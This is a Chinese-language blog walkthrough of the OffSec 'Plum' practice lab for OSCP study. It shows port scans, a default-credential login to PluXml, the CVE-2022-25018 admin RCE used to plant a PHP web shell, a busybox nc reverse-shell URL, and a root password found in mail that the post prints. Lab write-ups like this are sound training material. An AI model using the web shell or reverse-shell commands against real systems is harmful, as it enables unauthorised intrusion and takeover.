OSCP Plum Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Plum

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

PluXml 弱口令 –> PluXml 后台修改源代码,远程代码执行 –> www-data 用户权限 –> 用户旗帜

权限提升:

信息收集 –> www-data 用户邮件(/var/main) –> 泄漏 root 用户密码 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
sudo nmap -p- 192.168.190.28 --min-rate=2000

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
sudo nmap -p22,80 -sCV 192.168.190.28

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 PluXml 弱口令、后台远程代码漏洞(CVE-2022-25018)

访问靶机 HTTP 80 端口,发现系统部署了 PluXml CMS 应用,通过弱口令可进入系统后台,在后台发现应用版本为:PluXml 5.8.7。

1
admin/admin

搜索引擎检索 PluXml 5.8.7 exploit,发现系统后台存在远程代码执行漏洞(CVE-2022-25018)。

参考链接:

1
https://github.com/MoritzHuppert/CVE-2022-25018/blob/main/CVE-2022-25018.pdf

下载漏洞 PDF 介绍文件,使用在线 PDF 翻译网站将文档翻译为中文。

1
https://app.immersivetranslate.com/pdf/

修改后台修改网站源码实现远程代码执行。

1
<?php echo system("whoami");?>

写入一句话木马。

1
<?php echo system($_GET['cmd']);?>

1
http://192.168.190.28/index.php?static1/static-1&cmd=whoami

注意: 这里可以直接通过 system 函数执行反弹 shell,但这样会导致网站无法正常访问。

使用 nc 监听 1234 端口,利用写入的一句话木马执行反弹 shell,获取到系统 www-data 用户 shell。

1
2
nc -lvnp 1234
http://192.168.190.28/index.php?static1/static-1&cmd=busybox%20nc%20192.168.45.221%201234%20-e%20/bin/bash

升级为交互式 shell。

3.2.2 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Www-data 用户邮件泄漏 root 密码

由于靶机本地监听了 SMTP 25 端口,检索 /var/mail 目录,发现目录存在 www-data 用户邮件,在邮件中得到了 root 用户密码。

1
netstat -antlp

使用 su 命令切换至 root shell。

1
su root # 6s8kaZZNaZZYBMfh2YEW

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Linux #PluXml 后台弱口令并Get Shell #邮件敏感信息泄漏
OSCP Plum Write-up
https://www.f0nesec.top/2025/08/29/oscp-plum/
作者
F0ne
发布于
2025年8月29日
许可协议